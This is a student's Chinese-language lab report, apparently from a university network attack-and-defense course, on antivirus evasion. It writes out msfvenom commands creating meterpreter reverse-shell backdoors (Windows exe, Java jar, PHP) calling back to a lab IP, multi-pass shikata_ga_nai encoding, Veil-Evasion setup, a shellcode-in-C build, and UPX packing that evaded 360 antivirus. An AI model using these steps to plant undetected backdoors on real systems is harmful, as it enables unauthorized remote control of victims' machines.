20155328 《网络攻防》 实验三:免杀原理与实践

20155328 《网络攻防》 实验三:免杀原理与实践

实验过程记录

正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
将实验二中生成的后门程序投递到virscan网站上,扫描结果如下:
1065527-20180410223127002-1026508725.png

用virustotal扫描结果如下:
1065527-20180410223138661-1104618375.png

尝试用msf编码器对后门程序进行一次或多次编码。

一次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.217.128 LPORT=443 -f exe > met-encoded.exe

十次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.217.128 LPORT=443 -f exe > met-encoded10.exe
1065527-20180410223150134-1971295885.png

用命令msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20155312_backdoor_java.jar生成jar文件:
1065527-20180410223201205-83900002.png

用命令msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20155312_backdoor.php生成PHP后门程序:
1065527-20180410223212318-1813730585.png

veil-evasion

这个过程需要先安装veil-evasion,由于网速太慢,安装过程耗时太多。我用了同学的虚拟机来做这部分实验。

先在终端中输入veil命令启用veil;然后输入veil evasion进入。
1065527-20180410223231245-933935629.png
1065527-20180410223238665-2058901242.png

输入命令use python/meterpreter/rev_tcp.py用python语言重写meterpreter。
1065527-20180410223246733-1463170578.png

set LHOST 192.168.217.132设置反弹连接IP,set LPORT 5328设置端口。
1065527-20180410223254906-1239387342.png

输入generate生成文件,填写payload的名称。出现错误提示,没法用python语言。
1065527-20180410223305945-1155058211.png

然后就从头开始,将use...中的python换成c即可。
1065527-20180410223318485-1497774086.png
1065527-20180410223328337-1271770731.png

成功生成的payload如图所示。
1065527-20180410223338913-943531673.png

在virscan中投递,查看有没有起到免杀效果。可以看到还是好了很多的。
1065527-20180410223347838-133345137.png

C语言调用shellcode

kali终端下,输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=443 -f c,生成数组。
1065527-20180410223401049-326842430.png

创建20155328.c,把数组拷贝进去,并加上主函数。
1065527-20180410223410663-787461672.png

终端下输入i686-w64-mingw32-g++ MSSC.c -o 20155328.exe生成可执行文件20155328.exe。投递到virscan上。
1065527-20180410223420809-249242741.png

把可执行文件移到主机中,运行后马上就被360查出来了。(反应速度真的很快。。我都没反应过来
1065527-20180410223431850-995334993.png

(查出来)

加壳

在kali中用upx命令对可执行文件进行加壳操作。
1065527-20180410223439132-126746722.png

(加壳)

移到主机中,运行后进行全面杀毒,也没有查出来(朋友的电脑本身有一些危险

1065527-20180410223448212-2086810568.png

1065527-20180410223454228-10046540.png

基础问题回答

  • 杀软是如何检测出恶意代码的?

通过检测特征码或者特定行为。恶意代码都有其特有的特征码。

  • 免杀是干啥的?

防止计算机杀毒软件对恶意代码的查杀。

  • 免杀的基本方法有啥?

改变特征码;在看似正常的应用中插入特征码。

离实战缺什么

不知道该怎么把自己生成的后门放到想攻击的机器里。

实践总结与体会

老师今天上课说要带着好奇心去做。。其实做这个还是有点意思的,不断尝试检测看能否躲过杀毒软件,又不断改进。下次加油。。不要再拖到这么晚做了。。

转载于:https://www.cnblogs.com/zyqzyq/p/8783682.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值